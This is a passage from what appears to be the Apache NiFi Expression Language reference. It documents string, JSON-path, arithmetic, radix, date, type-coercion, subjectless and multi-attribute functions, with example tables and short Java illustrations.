[.function]\n=== lastIndexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *last* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n.lastIndexOf Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:lastIndexOf('a.*txt')}` | `-1`\n| `${filename:lastIndexOf('.')}` | `20`\n| `${filename:lastIndexOf('a')}` | `17`\n| `${filename:lastIndexOf(' ')}` | `11`\n|=======================================================================================\n\n\n[.function]\n=== jsonPath\n\n*Description*: [.description]#The `jsonPath` function generates a string by evaluating the Subject as JSON and applying a JSON\n path expression. An empty string is generated if the Subject does not contain valid JSON, the _jsonPath_ is invalid, or the path\n\tdoes not exist in the Subject. If the evaluation results in a scalar value, the string representation of the scalar value is\n\tgenerated. Otherwise, a string representation of the JSON result is generated. A JSON array of length 1 is special-cased:\n\twhen `[0]` is a scalar, the string representation of `[0]` is generated.^1^#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_jsonPath_# : [.argDesc]#The JSON path expression used to evaluate the Subject.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"myJson\" attribute is\n\n..........\n{\n \"firstName\": \"John\",\n \"lastName\": \"Smith\",\n \"isAlive\": true,\n \"age\": 25,\n \"address\": {\n \"streetAddress\": \"21 2nd Street\",\n \"city\": \"New York\",\n \"state\": \"NY\",\n \"postalCode\": \"10021-3100\"\n },\n \"phoneNumbers\": [\n {\n \"type\": \"home\",\n \"number\": \"212 555-1234\"\n },\n {\n \"type\": \"office\",\n \"number\": \"646 555-4567\"\n }\n ],\n \"children\": [],\n \"spouse\": null\n}\n..........\n\n.jsonPath Examples\n|===================================================================\n| Expression | Value\n| `${myJson:jsonPath('$.firstName')}` | `John`\n| `${myJson:jsonPath('$.address.postalCode')}` | `10021-3100`\n| `${myJson:jsonPath('$.phoneNumbers[?(@.type==\"home\")].number')}`^1^ | `212 555-1234`\n| `${myJson:jsonPath('$.phoneNumbers')}` | `[{\"type\":\"home\",\"number\":\"212 555-1234\"},{\"type\":\"office\",\"number\":\"646 555-4567\"}]`\n| `${myJson:jsonPath('$.missing-path')}` | _empty_\n| `${myJson:jsonPath('$.bad-json-path..')}` | _exception bulletin_\n|===================================================================\n\nAn empty subject value or a subject value with an invalid JSON document results in an exception bulletin.\n\n[[numbers]]\n== Mathematical Operations and Numeric Manipulation\n\nFor those functions that support Decimal and Number (whole number) types, the return value type depends on the input types. If either the\nsubject or the argument is a Decimal, then the result will be a Decimal. If both values are Numbers, then the result will be a Number. This includes\nDivide. This is to preserve backwards compatibility and to avoid forcing rounding errors.\n\n\n
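Since an Expression Language Number behaves like a Java long and a Decimal behaves like a Java double, the rule above matches Java's own arithmetic promotion. A tiny, illustrative Java sketch (hypothetical class name) showing why whole-number division truncates while Decimal division does not:\n\n[source,java]\n----\npublic class NumericTypeDemo {\n    public static void main(String[] args) {\n        \/\/ EL \"Number\" behaves like a Java long: whole-number division truncates\n        long fileSize = 100;\n        System.out.println(fileSize \/ 12);   \/\/ 8, like ${fileSize:divide(12)}\n        System.out.println(fileSize % 12);   \/\/ 4, like ${fileSize:mod(12)}\n\n        \/\/ Once a \"Decimal\" (Java double) is involved, the result stays a Decimal\n        double decimal = 100.0;\n        System.out.println(decimal \/ 12);    \/\/ 8.333333333333334, no truncation\n    }\n}\n----\n\n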
[.function]\n=== plus\n\n*Description*: [.description]#Adds a numeric value to the Subject. If either the argument or the Subject cannot be\n\tcoerced into a Number, returns `null`.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`\n\twill return the value `1100`.\n\n\n\n\n\n[.function]\n=== minus\n\n*Description*: [.description]#Subtracts a numeric value from the Subject.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`\n\twill return the value `0`.\n\n\n\n\n\n[.function]\n=== multiply\n\n*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to multiply the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`\n\twill return the value `102400`.\n\n\n\n\n[.function]\n=== divide\n\n*Description*: [.description]#Divides the Subject by a numeric value and returns the result.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`\n\twill return the value `8`.\n\n\n\n\n[.function]\n=== mod\n\n*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide\n\tthe Subject by the value of the argument and return not the quotient but rather the remainder.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`\n\twill return the value `4`.\n\n\n\n\n\n[.function]\n=== toRadix\n\n*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional second argument can be used to indicate the minimum number of characters to be used. If the converted value has fewer than this number of characters, the number will be padded with leading zeroes. 
If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\t- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"fileSize\" attribute has a value of 1024, then the following Expressions will yield\n\tthe following results:\n\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:toRadix(10)}` | `1024`\n| `${fileSize:toRadix(10, 1)}` | `1024`\n| `${fileSize:toRadix(10, 8)}` | `00001024`\n| `${fileSize:toRadix(16)}` | `400`\n| `${fileSize:toRadix(16, 8)}` | `00000400`\n| `${fileSize:toRadix(2)}` | `10000000000`\n| `${fileSize:toRadix(2, 16)}` | `0000010000000000`\n|=======================================================================================\n\n[.function]\n=== fromRadix\n\n*Description*: [.description]#Converts the Subject from a specified Radix (or number base) to a base ten whole number. The subject will be converted as-is, without interpretation, and all characters must be valid for the base being converted from. For example, converting \"0xFF\" from hex will not work due to \"x\" being an invalid hex character. If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Subject Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 1234A, then the following Expressions will yield\n\tthe following results:\n\n\n.fromRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:fromRadix(11)}` | `17720`\n| `${fileSize:fromRadix(16)}` | `74570`\n| `${fileSize:fromRadix(20)}` | `177290`\n|=======================================================================================\n\n[.function]\n=== random\n\n*Description*: [.description]#Returns a random whole number (0 to 2^63 - 1) using an insecure random number generator.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: `${random():mod(10):plus(1)}` returns a random number between 1 and 10, inclusive.\n\n[.function]\n=== math\n\n*Description*: [.description]#ADVANCED FEATURE. This expression is designed to be used by advanced users only. It utilizes Java Reflection to run arbitrary java.lang.Math static methods. The exact API will depend on the version of Java you are running. The Java 8 API can be found here: link:https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Math.html[https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Math.html^]\n +\nIn order to run the correct method, the parameter types must be correct. The Expression Language \"Number\" (whole number) type is interpreted as a Java \"long\". The \"Decimal\" type is interpreted as a Java \"double\". Running the desired method may require calling \"toNumber()\" or \"toDecimal()\" in order to \"cast\" the value to the desired type. 
This is also important to remember when cascading \"math()\" calls, since the return type depends on the method that was run.#\n\n*Subject Type*: [.subject .subjectless]#Subjectless, Number or Decimal (depending on the desired method to run)#\n\n*Arguments*:\n\n\t- [.argName]#_Method_# : [.argDesc]#The name of the Java Math method to run#\n\t- [.argName]#_Optional Argument_# : [.argDesc]#Optional argument that acts as the second parameter to the method.#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on method run)#\n\n*Examples*:\n\n\t- ${math(\"random\")} runs Math.random().\n\n\t- ${literal(2):toDecimal():math(\"pow\", 2.5)} runs Math.pow(2D,2.5D).\n\n\t- ${literal(64):toDecimal():math(\"cbrt\"):toNumber():math(\"max\", 5)} runs Math.max((Double.valueOf(Math.cbrt(64D))).longValue(), 5L). The \"toDecimal()\" call is needed because \"cbrt\" takes a \"double\" as input and \"64\" would otherwise be interpreted as a long. The \"toNumber()\" call is necessary because \"cbrt\" returns a double, while the \"max\" method must have parameters of the same type and \"5\" is interpreted as a long.\n\n\t- ${literal(5.4):math(\"scalb\", 2)} runs Math.scalb(5.4, 2). This example is important because NiFi EL treats all whole numbers as \"longs\" and there is no concept of an \"int\". \"scalb\" takes a second parameter of an \"int\" and it is not overloaded to accept longs, so it could not be run without special type handling. In the instance where the Java method cannot be found using parameters of type \"double\" and \"long\", the \"math()\" EL function will attempt to find a Java method with the same name but parameters of \"double\" and \"int\".\n\n\t- ${first:toDecimal():math(\"pow\", ${second:toDecimal()})} where attributes evaluate to \"first\" = 2.5 and \"second\" = 2. This example runs Math.pow(2.5D, 2D). The explicit calls to toDecimal() are important because of the dynamic nature of EL. When creating the flow, the user is unaware if the expression language values will be able to be interpreted as a whole number or not. In this example, without the explicit calls to \"toDecimal()\", the \"math\" function would attempt to run a Java method \"pow\" with types \"double\" and \"long\" (which doesn't exist).\n
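As the description above states, `math()` uses Java Reflection against `java.lang.Math`, matching EL Numbers to \"long\" parameters and Decimals to \"double\" parameters. The following illustrative Java sketch (hypothetical class name; a simplified view of that resolution, not NiFi's actual code) shows the two lookups discussed in the examples:\n\n[source,java]\n----\nimport java.lang.reflect.Method;\n\npublic class MathReflectionDemo {\n    public static void main(String[] args) throws Exception {\n        \/\/ ${literal(2):toDecimal():math(\"pow\", 2.5)} resolves to Math.pow(double, double)\n        Method pow = Math.class.getMethod(\"pow\", double.class, double.class);\n        System.out.println(pow.invoke(null, 2d, 2.5d));   \/\/ 5.656854249492381\n\n        \/\/ ${literal(5.4):math(\"scalb\", 2)} needs the (double, int) overload,\n        \/\/ since there is no Math.scalb(double, long)\n        Method scalb = Math.class.getMethod(\"scalb\", double.class, int.class);\n        System.out.println(scalb.invoke(null, 5.4d, 2));  \/\/ 21.6\n    }\n}\n----\n\n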
[[dates]]\n== Date Manipulation\n\n\n\n[[format]]\n[.function]\n=== format\n\n*Description*: [.description]#Formats a number as a date\/time according to the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that\n\trepresents the number of milliseconds since Midnight GMT on January 1, 1970. The number will be evaluated using the local\n\ttime zone unless specified in the second optional argument.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#\n\t- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use (in the Java TimeZone syntax)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"time\" has the value \"1420058163264\", then the following Expressions will yield\n\tthe following results:\n\n.format Examples\n|============================================================================\n| Expression | Value\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"GMT\")}` | `2014\/12\/31 20:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"America\/Los_Angeles\")}` | `2014\/12\/31 12:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"Asia\/Tokyo\")}` | `2015\/01\/01 05:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd\", \"GMT\")}` | `2014\/12\/31`\n| `${time:format(\"HH:mm:ss.SSS\\'Z'\", \"GMT\")}` | `20:36:03.264Z`\n| `${time:format(\"yyyy\", \"GMT\")}` | `2014`\n|============================================================================\n\n\n\n\n\n[.function]\n=== toDate\n\n*Description*: [.description]#Converts a String into a Date data type, based on the format specified by the argument. The argument\n\tmust be a String in valid Java SimpleDateFormat syntax. The Subject is expected to be a String that is formatted\n\taccording to the argument. The date will be evaluated using the local time zone unless specified in the second optional argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t\t- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat syntax.#\n\t\t- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use when parsing the Subject, in the Java TimeZone syntax.#\n\n\n*Return Type*: [.returnType]#Date#\n\n*Examples*: If the attribute \"year\" has the value \"2014\" and the attribute \"time\" has the value \"2014\/12\/31 15:36:03.264Z\",\n\tthen the Expression `${year:toDate('yyyy', 'GMT')}` will return a Date data type with a value representing Midnight GMT on\n\tJanuary 1, 2014. The Expression `${time:toDate(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\", \"GMT\")}` will result in a Date data type for\n\t15:36:03.264 GMT on December 31, 2014.\n\nOften, this function is used in conjunction with the <<format>> function to change the format of a date\/time. For example,\nif the attribute \"date\" has the value \"12-24-2014\" and we want to change the format to \"2014\/12\/24\", we can do so by\nchaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy\/MM\/dd')}`.\n\n\n
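Since both `format` and `toDate` state that they use the Java SimpleDateFormat syntax, their behavior can be previewed with `java.text.SimpleDateFormat` directly. An illustrative Java sketch (hypothetical class name) reproducing the chaining example above and one row of the format table:\n\n[source,java]\n----\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\nimport java.util.TimeZone;\n\npublic class DateFormatDemo {\n    public static void main(String[] args) throws Exception {\n        \/\/ like ${date:toDate('MM-dd-yyyy'):format('yyyy\/MM\/dd')}\n        SimpleDateFormat in = new SimpleDateFormat(\"MM-dd-yyyy\");\n        SimpleDateFormat out = new SimpleDateFormat(\"yyyy\/MM\/dd\");\n        Date parsed = in.parse(\"12-24-2014\");\n        System.out.println(out.format(parsed));                    \/\/ 2014\/12\/24\n\n        \/\/ like ${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\", \"GMT\")} on 1420058163264\n        SimpleDateFormat gmt = new SimpleDateFormat(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\");\n        gmt.setTimeZone(TimeZone.getTimeZone(\"GMT\"));\n        System.out.println(gmt.format(new Date(1420058163264L)));  \/\/ 2014\/12\/31 20:36:03.264Z\n    }\n}\n----\n\n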
[.function]\n=== now\n\n*Description*: [.description]#Returns the current date and time as a Date data type object.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Date#\n\n*Examples*: We can get the current date and time as a Date data type by using the `now` function: `${now()}`. As an example,\n\ton Wednesday December 31st 2014 at 36 minutes after 3pm and 3.123 seconds EST `${now()}` would be evaluated to be a\n\tDate type representing that time. Since a whole Expression Language expression can only return a String, it would be formatted as\n\t`Wed Dec 31 15:36:03 EST 2014` when the expression completes.\n\nUtilizing the <<toNumber>> method, `now` can provide the current date and time as the number of milliseconds since\nMidnight GMT on January 1, 1970. For instance, if, instead of executing `${now()}` in the previous example, `${now():toNumber()}`\nwas run, then it would output `1420058163123`. This method provides millisecond-level precision and provides the ability to\nmanipulate the value.\n\n.now Examples\n|==================================================================================================================\n| Expression | Value\n| `${now()}` | A Date type representing the current date and time to the nearest millisecond\n| `${now():toNumber()}` | The number of milliseconds since midnight GMT Jan 1, 1970 (`1420058163123`, for example)\n| `${now():toNumber():minus(86400000)}` | A number representing the time 24 hours ago\n| `${now():format('yyyy')}` | The current year\n| `${now():toNumber():minus(86400000):format('E')}` | The day of the week that was yesterday,\n\t\t\t\t\t\t\t\t\t\t\t\t\t as a 3-letter abbreviation (For example, `Wed`)\n|==================================================================================================================\n\n\n\n\n[[type_cast]]\n== Type Coercion\n\n[.function]\n=== toString\n\n*Description*: [.description]#Coerces the Subject into a String#\n\n*Subject Type*: [.subject]#Any type#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of the \"fileSize\" attribute to a number and\n\tback to a String.\n\n\n\n[[toNumber]]\n[.function]\n=== toNumber\n\n*Description*: [.description]#Coerces the Subject into a Number#\n\n*Subject Type*: [.subject]#String, Decimal, or Date#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: The Expression `${fileSize:toNumber()}` converts the attribute value of \"fileSize\" to a number.\n\n\n[.function]\n=== toDecimal\n\n*Description*: [.description]#Coerces the Subject into a Decimal#\n\n*Subject Type*: [.subject]#String, Whole Number or Date#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Decimal#\n\n*Examples*: The Expression `${fileSize:toDecimal()}` converts the attribute value of \"fileSize\" to a decimal.\n\n\n\n\n[[subjectless]]\n== Subjectless Functions\n\nWhile the majority of functions in the Expression Language are called by using the syntax\n`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.\nIn this case, the attribute name is not present. For example, the IP address of the machine can\nbe obtained by using the Expression `${ip()}`. All of the functions in this section are to be called\nwithout a subject. Attempting to call a subjectless function and provide it a subject will result in\nan error when validating the function.\n\n\n[.function]\n=== ip\n\n*Description*: [.description]#Returns the IP address of the machine.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The IP address of the machine can be obtained by using the Expression `${ip()}`.\n\n\n\n\n\n[.function]\n=== hostname\n\n*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided\n\tto specify whether or not the Fully Qualified Domain Name should be used. 
If `false`, or not specified,\n\tthe hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname\n\tcannot be resolved, the simple hostname will be returned.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*:\n\n\t- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be\n\t\tfully qualified. If not specified, defaults to false.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,\n\twhile the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.\n\n\n\n\n\n[.function]\n=== UUID\n\n*Description*: [.description]#Returns a randomly generated UUID.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${UUID()}` returns a value similar to `de305d54-75b4-431b-adb2-eb6b9e546013`\n\n\n\n\n\n[.function]\n=== nextInt\n\n*Description*: [.description]#Returns a one-up value (starting at 0) that increases over the lifetime of the running instance of NiFi.\n\tThis value is not persisted across restarts and is not guaranteed to be unique across a cluster.\n\tThis value is considered \"one-up\" in that if called multiple times across the NiFi instance, the values will be sequential.\n\tHowever, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will\n\tnot guarantee sequential values within the context of a particular Processor.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available\n\tinteger (6) and divides the result by 2, returning a value of `3`.\n\n\n\n[.function]\n=== literal\n\n*Description*: [.description]#Returns its argument as a literal String value. This is useful in order to treat a string or a number\n\tat the beginning of an Expression as an actual value, rather than treating it as an attribute name. Additionally, it\n\tcan be used when the argument is an embedded Expression that we would then like to evaluate additional functions against.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to be treated as a literal string, number, or boolean value.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${literal(2):gt(1)}` returns `true`\n\n`${literal( ${allMatchingAttributes('a.*'):count()} ):gt(3)}` returns `true` if there are more than 3 attributes whose\nnames begin with the letter `a`.\n\n[.function]\n=== getStateValue\n\n*Description*: [.description]#Accesses a processor's state values by passing in the String key and getting the value back as a String. This\n is a special Expression Language function that only works with processors that explicitly allow EL to query state. Currently, only UpdateAttribute\n does.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Key_# : [.argDesc]#The key to use when accessing the state map.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: An UpdateAttribute processor has stored the key \"count\" with the value \"20\" in state. 
`${getStateValue(\"count\")}` returns `20`.\n\n\n\n[.function]\n=== thread\n\n*Description*: [.description]#Returns the name of the thread used by the processor when evaluating the Expression. This can be useful\n when using a processor with multiple concurrent tasks and where some data uniqueness is required.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${thread()}` could return something like `Timer-Driven Process Thread-4`.\n\n\n\n[[multi]]\n== Evaluating Multiple Attributes\n\nWhen it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the\n`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi\nprovides several functions for evaluating the same conditions against groups of attributes at the same time.\n\n\n\n\n[.function]\n=== anyAttribute\n\n*Description*: [.description]#Checks to see if any of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\", consider the following examples:\n\n.anyAttribute Examples\n|=======================================================================\n| Expression | Value\n| `${anyAttribute(\"abc\", \"xyz\"):contains(\"bye\")}` | `true`\n| `${anyAttribute(\"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=======================================================================\n\n\n\n\n[.function]\n=== allAttributes\n\n*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. 
Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\", consider the following examples:\n\n.allAttributes Examples\n|=============================================================================\n| Expression | Value\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\")}` | `true`\n| `${allAttributes(\"abc\", \"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=============================================================================\n\n\n\n\n\n[.function]\n=== anyMatchingAttribute\n\n*Description*: [.description]#Checks to see if any of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\", consider the following examples:\n\n.anyMatchingAttribute Examples\n|==============================================================\n| Expression | Value\n| `${anyMatchingAttribute(\"[ax].*\"):contains('bye')}` | `true`\n| `${anyMatchingAttribute(\".*\"):isNull()}` | `false`\n|==============================================================\n\n\n\n\n\n[.function]\n=== allMatchingAttributes\n\n*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. 
Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\", consider the following examples:\n\n.allMatchingAttributes Examples\n|==============================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):contains(\"world\")}` | `true`\n| `${allMatchingAttributes(\".*\"):isNull()}` | `false`\n| `${allMatchingAttributes(\"f.*\"):count()}` | `1`\n|==============================================================\n\n\n\n\n\n[.function]\n=== anyDelineatedValue\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this\n\tfunction returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression,\n\t\tthough it does not have to be.#\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"the,and,or,not\",\n\tconsider the following examples:\n\n.anyDelineatedValue Examples\n|===============================================================================\n| Expression | Value\n| `${anyDelineatedValue(\"${number_list}\", \",\"):contains(\"5\")}` | `true`\n| `${anyDelineatedValue(\"this that and\", \",\"):equals(\"${word_list}\")}` | `false`\n|===============================================================================\n\n\n\n[.function]\n=== allDelineatedValues\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each\n\tcase, then this function returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. 
This is generally\n\t\tan embedded Expression, though it does not have to be.#\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"those,known,or,not\",\n\tconsider the following examples:\n\n.allDelineatedValues Examples\n|===============================================================================\n| Expression | Value\n| `${allDelineatedValues(\"${word_list}\", \",\"):contains(\"o\")}` | `true`\n| `${allDelineatedValues(\"${number_list}\", \",\"):count()}` | `5`\n| `${allDelineatedValues(\"${number_list}\", \",\"):matches(\"[0-9]+\")}` | `true`\n| `${allDelineatedValues(\"${word_list}\", \",\"):matches('e')}` | `false`\n|===============================================================================\n\n\n\n\n[.function]\n=== join\n\n*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function\n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\", consider the following examples:\n\n.join Examples\n|=======================================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):join(\"-\")}` | `hello-good`\n| `${allAttributes(\"abc\", \"xyz\"):join(\" now\")}` | `hello world 